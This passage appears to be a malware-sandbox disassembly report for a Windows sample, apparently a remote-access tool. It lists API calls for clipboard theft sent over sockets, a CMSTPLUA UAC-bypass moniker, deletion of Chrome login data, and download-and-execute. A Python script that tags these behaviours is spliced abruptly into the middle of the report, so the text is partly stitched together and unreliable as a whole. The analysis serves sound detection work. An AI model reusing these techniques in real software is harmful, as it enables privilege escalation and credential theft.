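• Opcode ID: daeca0702860bda2ef77ef08a621ae374cce09983122bbe014a2eaaa7ea96c44
APIs
• OpenClipboard.USER32 ref: 000D5A61
• GetClipboardData.USER32(0000000D), ref: 000D5A71
  • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
• String ID:
• Opcode ID: eed858fda5cff2ca45370d4a121a9d70161ffb83c2b095c42430eb99269e5a5f
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00134358), ref: 000CE25E
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 000CE27A
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
• Opcode ID: f9d61f03c2dcabf9a30f547f677fc70b8eefa047e8d464031981e59ae9714bc5
APIs
• _wcslen.LIBCMT ref: 000C6788
• CoGetObject.OLE32(?,00000024,001259B0,00000000), ref: 000C67E9
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• Opcode ID: e5778c71cb5c13cfc3a251249d5526c556f228b27c889bd4f2a860aecfb16c39
APIs
• LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 000D31ED
• GetProcAddress.KERNEL32(00000000), ref: 000D31F4
• Opcode ID: 552b9b5c95ec1acb192b3ea4694053c940f4073e668df5bfd3c38c7762ec671d
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 000CB257
• Opcode ID: 87f9688345691822408b81ddab6a89f43b23d76aca02a571097821d011e29d6e
APIs
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 000D6ADD
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 000D6AFC
• Opcode ID: a353a65cc900b71729c4d9d59696f207bd8a6f44974c8608f31d5d6c3a47b561
"""
# One API line: optional "Part of subcall function X:" prefix, Api.MODULE, optional stack args, "ref: addr".
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?"
    r"(?P<api>[A-Za-z0-9_@]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$")
STRING_ID_RE = re.compile(r"^•\s+String ID:\s*(?P<s>.*)$")
OPCODE_RE = re.compile(r"^•\s+Opcode ID:\s*(?P<id>[0-9a-f]+)$")

@dataclass
class Func:
    opcode_id: str = ""
    calls: list = field(default_factory=list)   # (api, module, args, via_subcall)
    strings: set = field(default_factory=set)

    @property
    def apis(self) -> set:
        return {api for api, _, _, _ in self.calls}

    def mentions(self, pattern: str) -> bool:
        """True if a referenced string or a printed stack argument matches pattern."""
        rx = re.compile(pattern, re.IGNORECASE)
        return any(rx.search(t) for t in [*self.strings, *(c[2] for c in self.calls)])

def parse_report(text: str) -> list:
    """One Func per 'APIs' block; lines the regexes do not recognise are skipped."""
    funcs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Func()
            funcs.append(cur)
        elif cur is None:
            continue
        elif m := API_RE.match(line):
            cur.calls.append((m["api"], m["mod"], m["args"] or "", m["sub"] is not None))
        elif m := STRING_ID_RE.match(line):
            cur.strings.update(s for s in m["s"].split("$") if s)  # '$' separates strings
        elif m := OPCODE_RE.match(line):
            cur.opcode_id = m["id"]
    return funcs

# Behaviour rules (tag, predicate), keyed only on API names and strings visible in the listings.
RULES = [
    ("uac-bypass-cmstplua", lambda f: "CoGetObject" in f.apis
        and f.mentions(r"Elevation:Administrator!new:|3E5FC7F9-9A51-4367-9063-A120244FBEC7")),
    ("browser-store-wipe", lambda f: bool(f.apis & {"DeleteFileA", "DeleteFileW", "FindFirstFileA", "FindFirstFileW"})
        and f.mentions(r"Login Data|cookies\.sqlite")),
    ("clipboard-read-and-send", lambda f: {"OpenClipboard", "GetClipboardData", "send"} <= f.apis),
    ("shutdown-privilege", lambda f: "AdjustTokenPrivileges" in f.apis and f.mentions(r"SeShutdownPrivilege")),
    ("dynamic-api-resolution", lambda f: {"LoadLibraryA", "GetProcAddress"} <= f.apis),
    ("process-enum-injection-target", lambda f: {"CreateToolhelp32Snapshot", "Process32FirstW"} <= f.apis
        and f.mentions(r"\bInj\b|ieinstal\.exe|ielowutil\.exe")),
]

def tag_functions(text: str) -> dict:
    """Map each function's Opcode ID prefix to the rule tags that fire on it."""
    tags = {}
    for f in parse_report(text):
        hits = {tag for tag, pred in RULES if pred(f)}
        if hits:
            tags[f.opcode_id[:12]] = hits
    return tags
```

Subcall lines are folded into the caller's call set on purpose: the clipboard routine only becomes exfiltration once the send in subcall 000C4468 is counted with OpenClipboard and GetClipboardData, and a per-function view that drops subcalls would miss that pairing. Stack arguments are searched alongside String ID values because Joe prints pushed strings such as SeShutdownPrivilege and the Chrome Login Data path only as arguments in some listings.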
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 000C89AE
                                                • Part of subcall function 000C41F1: socket.WS2_32(?,00000001,00000006), ref: 000C4212
                                                • Part of subcall function 000C428C: connect.WS2_32(?,?,?), ref: 000C42A5
                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 000C8A8D
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 000C8AE0
                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 000C8AF7
                                                • Part of subcall function 000C4468: WaitForSingleObject.KERNEL32(?,00000000,LL,?,?,00000004,?,?,00000004,00133EE8,001345A8,00000000), ref: 000C450E
                                                • Part of subcall function 000C4468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00133EE8,001345A8,00000000,?,?,?,?,?,000D4CE9), ref: 000C453C
                                                • Part of subcall function 000C47EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C47FD
                                                • Part of subcall function 000C47EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C4808
                                                • Part of subcall function 000C47EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C4811
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 000C8DA1
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                              • String ID:
                                              • API String ID: 4043647387-0
                                              • Opcode ID: 7793234c4540c886fa216cce72bf922efbe1d74f62b397d5cffca15084bdccc9
                                              • Instruction ID: 70ef6dec32a2533b2b2776c13c944399b3af762b622c0457357d297f91a84fda
                                              • Opcode Fuzzy Hash: 7793234c4540c886fa216cce72bf922efbe1d74f62b397d5cffca15084bdccc9
                                              • Instruction Fuzzy Hash: F9A13A329001189ACB18EBA0DC96FED7779AF55310F50826EF906A71D3EF345E498B54
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,000D981A,00000000,00000000), ref: 000D9BCD
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,000D981A,00000000,00000000), ref: 000D9BE2
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,000D981A,00000000,00000000), ref: 000D9BEF
                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,000D981A,00000000,00000000), ref: 000D9BFA
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,000D981A,00000000,00000000), ref: 000D9C0C
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,000D981A,00000000,00000000), ref: 000D9C0F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                              • String ID:
                                              • API String ID: 276877138-0
                                              • Opcode ID: 3eab08321d2923db705b4826b722b2ed736b2d6f7f85560789566b838743b73c
                                              • Instruction ID: 91c676cca3cb80f4b5aeaa5c39984dab08c89d52d3921a9e9e249b77434f7a13
                                              • Opcode Fuzzy Hash: 3eab08321d2923db705b4826b722b2ed736b2d6f7f85560789566b838743b73c
                                              • Instruction Fuzzy Hash: D2F0E9714043146FD2145B30AD88EFF2A7CDF8B360B00441AF44193381CF64CD85A5B1
                                              APIs
                                              • lstrcmpA.KERNEL32(1.3.6.1.4.1.311.2.1.12,?,004E9598,0000001C), ref: 0040852B
                                              • CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,00000000,?), ref: 00408553
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00408569
                                              • CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,?,?), ref: 00408595
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CryptDecodeObject$AllocLocallstrcmp
                                              • String ID: 1.3.6.1.4.1.311.2.1.12
                                              • API String ID: 3284379815-2596186611
                                              • Opcode ID: 97ffdf57a553b8638c6a0d76eebed708acadcd14246dfc87692436479d3a763c
                                              • Instruction ID: c873b066cdd88eb137005279340a5094d2e94afccd150f66e497f36c002e7681
                                              • Opcode Fuzzy Hash: 97ffdf57a553b8638c6a0d76eebed708acadcd14246dfc87692436479d3a763c
                                              • Instruction Fuzzy Hash: CE416331900606EFCF208F95C94099ABBB4FF08310B15846EE995BB692DF75ED80CF58
                                              APIs
                                                • Part of subcall function 000D6AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 000D6AC4
                                                • Part of subcall function 000D6AB7: OpenProcessToken.ADVAPI32(00000000), ref: 000D6ACB
                                                • Part of subcall function 000D6AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 000D6ADD
                                                • Part of subcall function 000D6AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 000D6AFC
                                                • Part of subcall function 000D6AB7: GetLastError.KERNEL32 ref: 000D6B02
                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 000D595B
                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 000D5970
                                              • GetProcAddress.KERNEL32(00000000), ref: 000D5977
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                              • String ID: PowrProf.dll$SetSuspendState
                                              • API String ID: 1589313981-1420736420
                                              • Opcode ID: 01984f15f91850ecb92b5d2c3b66f1131ed238c0169c44ae88b8195b01106fd7
                                              • Instruction ID: f11f7cb7fd1bd9a88d13340cf7e23e21fd5283f6ca9c7703d2bc122ae1fd9199
                                              • Opcode Fuzzy Hash: 01984f15f91850ecb92b5d2c3b66f1131ed238c0169c44ae88b8195b01106fd7
                                              • Instruction Fuzzy Hash: E121717160871196CF24F7B09CA6FFE626A9F82742F444C2EB503A72C3EF748D458661
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00111502,?,00000000), ref: 0011127C
                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00111502,?,00000000), ref: 001112A5
                                              • GetACP.KERNEL32(?,?,00111502,?,00000000), ref: 001112BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID: ACP$OCP
                                              • API String ID: 2299586839-711371036
                                              • Opcode ID: fd8c9e3786da7167ee0f12532e4bd2f62890ad653d227e4c0914870ec32a9a77
                                              • Instruction ID: 910d20de5e23ee7b0162f01654e458df65529cd174b93c3300296a38d1d71e52
                                              • Opcode Fuzzy Hash: fd8c9e3786da7167ee0f12532e4bd2f62890ad653d227e4c0914870ec32a9a77
                                              • Instruction Fuzzy Hash: 61219026A04104B6DB2C8F94DA00AE7F3A7AB55B60B768934EF0AD7650F732DDC1C390
                                              APIs
                                              • lstrcmpA.KERNEL32(?,1.2.840.113549.1.9.6,004E95D8,0000001C), ref: 0040870A
                                              • CryptDecodeObject.CRYPT32(00010001,000001F4,?,?,00000000,00000000,?), ref: 0040873C
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040874A
                                              • CryptDecodeObject.CRYPT32(00010001,000001F4,?,?,00000000,00000000,?), ref: 00408776
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CryptDecodeObject$AllocLocallstrcmp
                                              • String ID: 1.2.840.113549.1.9.6
                                              • API String ID: 3284379815-2921522063
                                              • Opcode ID: 1c03ec7a59233b454a33b4503108e448d365118ad8ecf43816259d6b52f441a0
                                              • Instruction ID: a788b97eae109580f0cac5c22c45467d660d294b5013f0328b589f60dcf9ace9
                                              • Opcode Fuzzy Hash: 1c03ec7a59233b454a33b4503108e448d365118ad8ecf43816259d6b52f441a0
                                              • Instruction Fuzzy Hash: FA218C71A4020AEFDB11CF95CD41B99BBB4BF58304F20406AEA50BB2A5DBB5E940CB18
                                              APIs
                                              • lstrcmpA.KERNEL32(1.2.840.113549.1.9.5,?), ref: 0040865E
                                              • CryptDecodeObject.CRYPT32(00010001,1.2.840.113549.1.9.5,?,00000008,00000000,?,00000008), ref: 0040869A
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004086AC
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 004086B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Time$File$CryptDecodeLocalObjectSystemlstrcmp
                                              • String ID: 1.2.840.113549.1.9.5
                                              • API String ID: 1508694121-925610549
                                              • Opcode ID: 86d0d2358ef50f1fe37fed75dc18d9d99c9f79cf8d992799e0c2c3ea88eaf1c7
                                              • Instruction ID: f212b015d127512b5763636b9bb1128a0e4d06747a3459900feecbf1282a5b97
                                              • Opcode Fuzzy Hash: 86d0d2358ef50f1fe37fed75dc18d9d99c9f79cf8d992799e0c2c3ea88eaf1c7
                                              • Instruction Fuzzy Hash: 52118E71900208EFCB00CF84C984AEEBBB8FF58340F10446AE946A7660DB71E985CB54
                                              APIs
                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 000DA650
                                              • LoadResource.KERNEL32(00000000,?,?,000CE183,00000000), ref: 000DA664
                                              • LockResource.KERNEL32(00000000,?,?,000CE183,00000000), ref: 000DA66B
                                              • SizeofResource.KERNEL32(00000000,?,?,000CE183,00000000), ref: 000DA67A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Resource$FindLoadLockSizeof
                                              • String ID: SETTINGS
                                              • API String ID: 3473537107-594951305
                                              • Opcode ID: 8777350f99206a5227d25504e77679ee1c9d4b89dac121655346d5da60ae20b2
                                              • Instruction ID: b51e8ccd42966c0d172b9e8b4e8e2254c0f5fdba0a00dd39b3a03546846d90a0
                                              • Opcode Fuzzy Hash: 8777350f99206a5227d25504e77679ee1c9d4b89dac121655346d5da60ae20b2
                                              • Instruction Fuzzy Hash: 5EE01A7A604310BBCB251BA1BD4CD877F79E7C6B623048026FD05827A0DB758890CA20
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106F1E
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F2B
                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 001114C3
                                              • IsValidCodePage.KERNEL32(00000000), ref: 0011151E
                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0011152D
                                              • GetLocaleInfoW.KERNEL32(?,00001001,00103CEC,00000040,?,00103E0C,00000055,00000000,?,?,00000055,00000000), ref: 00111575
                                              • GetLocaleInfoW.KERNEL32(?,00001002,00103D6C,00000040), ref: 00111594
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                              • String ID:
                                              • API String ID: 745075371-0
                                              • Opcode ID: 5351d19594ae2bcf4429ed75b8230b97fdfcb7a91448fe5f7033e51e106faf18
                                              • Instruction ID: 02929ca606a81265c54b09411609fec9f15d45e88d267e1fb5c2f4de2c3adfb6
                                              • Opcode Fuzzy Hash: 5351d19594ae2bcf4429ed75b8230b97fdfcb7a91448fe5f7033e51e106faf18
                                              • Instruction Fuzzy Hash: 1B519371900219BBDF28DFA5DC41AFEB3B9BF18B00F054579FA15EB990E77099808B61
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 000C7A91
                                              • FindFirstFileW.KERNEL32(00000000,?,00125AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C7B4A
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C7B6E
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C7C76
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstH_prologNext
                                              • String ID:
                                              • API String ID: 1157919129-0
                                              • Opcode ID: fd8887c757a7d28e91a3276f32a7bf2c003806323f044ec35bd992cc56716f33
                                              • Instruction ID: abf4214e9a4de81e838b3c8605eff83d7379da03e62e0a8cd9075c1b8de93cd7
                                              • Opcode Fuzzy Hash: fd8887c757a7d28e91a3276f32a7bf2c003806323f044ec35bd992cc56716f33
                                              • Instruction Fuzzy Hash: 7E518E32900209AACB14FBA4DD96FED7BB8AF55310F50415DF80AA3193EF349B49CB91
                                              APIs
                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0011D478), ref: 00108079
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0013179C,000000FF,00000000,0000003F,00000000,?,?), ref: 001080F1
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,001317F0,000000FF,?,0000003F,00000000,?), ref: 0010811E
                                              • _free.LIBCMT ref: 00108067
                                                • Part of subcall function 00106AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?), ref: 00106ADB
                                                • Part of subcall function 00106AC5: GetLastError.KERNEL32(?,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?,?), ref: 00106AED
                                              • _free.LIBCMT ref: 00108233
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                              • String ID:
                                              • API String ID: 1286116820-0
                                              • Opcode ID: 4eb6bbebce76ea331f41522f999f477314f4b15e2a59c646295e93a9f7f90cb4
                                              • Instruction ID: 9607462203e7fbf922a8127c862265653857c1df77335ef0f3616e8669ec5ce9
                                              • Opcode Fuzzy Hash: 4eb6bbebce76ea331f41522f999f477314f4b15e2a59c646295e93a9f7f90cb4
                                              • Instruction Fuzzy Hash: 4651E771908209EFCB14EF64DC819AEB7B8EF54360F14456AF4D4A36D1EBB09E46CB50
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 000C6234
                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 000C6318
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DownloadExecuteFileShell
                                              • String ID: C:\Users\user\Desktop\4wECQoBvYC.exe$open
                                              • API String ID: 2825088817-1997188799
                                              • Opcode ID: d6161a76a56e3a2a1d81b6c424b6d7c303e5dba6b4d4fea83c12e7fca4327de6
                                              • Instruction ID: 40dd14744781f6467aab516fe75c894177dd3d40c72901b126dd38023ef75dae
                                              • Opcode Fuzzy Hash: d6161a76a56e3a2a1d81b6c424b6d7c303e5dba6b4d4fea83c12e7fca4327de6
                                              • Instruction Fuzzy Hash: 5F617F31604340A7DB24FB74D996FFE77A69F92710F40491DB8429B2C3EF259A09C6A2
                                              APIs
                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 000DBC6C
                                                • Part of subcall function 000D26D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 000D26E1
                                                • Part of subcall function 000D26D2: RegSetValueExA.KERNEL32(?,00126748,00000000,?,00000000,00000000,001342F8,?,?,000CE5FB,00126748,5.3.0 Pro), ref: 000D2709
                                                • Part of subcall function 000D26D2: RegCloseKey.KERNEL32(?,?,?,000CE5FB,00126748,5.3.0 Pro), ref: 000D2714
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateInfoParametersSystemValue
                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                              • API String ID: 4127273184-3576401099
                                              • Opcode ID: 020ef7a2eb6039c9defcdfb25c22a0778aeb3533d82c5ab8d29f125101a6d8eb
                                              • Instruction ID: 500433bfc65f3eac77cdb6ed82df7375db834e2baf08aaa85bbc979154f58607
                                              • Opcode Fuzzy Hash: 020ef7a2eb6039c9defcdfb25c22a0778aeb3533d82c5ab8d29f125101a6d8eb
                                              • Instruction Fuzzy Hash: 6A11A832B8432073D51835395E9BFEE2912A756B60F92011EF6013A3D7EB969A7103E2
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00103CF3,?,?,?,?,0010374A,?,00000004), ref: 00110B61
                                              • _wcschr.LIBVCRUNTIME ref: 00110BF1
                                              • _wcschr.LIBVCRUNTIME ref: 00110BFF
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00103CF3,00000000,00103E13), ref: 00110CA2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                              • String ID:
                                              • API String ID: 4212172061-0
                                              • Opcode ID: ba0b78a7be99331f80499641488928d4615f50e416df077138342ec3cb34fd44
                                              • Instruction ID: aee84a0b32f61fa792fd0e0d93d9bb881e6d08991ed2584887c6e5f05d10a2f2
                                              • Opcode Fuzzy Hash: ba0b78a7be99331f80499641488928d4615f50e416df077138342ec3cb34fd44
                                              • Instruction Fuzzy Hash: 6361C675E04306AAD72EAB65DC42BEB73A8EF5C310F140579F905DB181EBB0A9C587A0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 000C8DAC
                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 000C8E24
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 000C8E4D
                                              Memory Dump Source
